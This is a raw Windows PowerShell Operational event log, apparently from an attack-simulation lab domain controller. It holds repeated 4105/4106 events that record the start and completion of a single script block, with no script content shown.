06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474183
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474182
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474181
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474180
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474179
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474178
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474177
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474176
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474175
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474174
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474173
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474172
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474171
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474170
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474169
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474168
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474167
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474166
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474165
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474164
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474163
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474162
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474161
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474160
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474159
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474158
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474157
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474156
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474155
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474154
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474153
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474152
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474151
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474150
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474149
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474148
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474147
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474146
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474145
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474144
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474143
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474142
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474141
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474140
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474139
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474138
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474137
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474136
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474135
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474134
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474133
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474132
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474131
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474130
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474129
Keywords=None
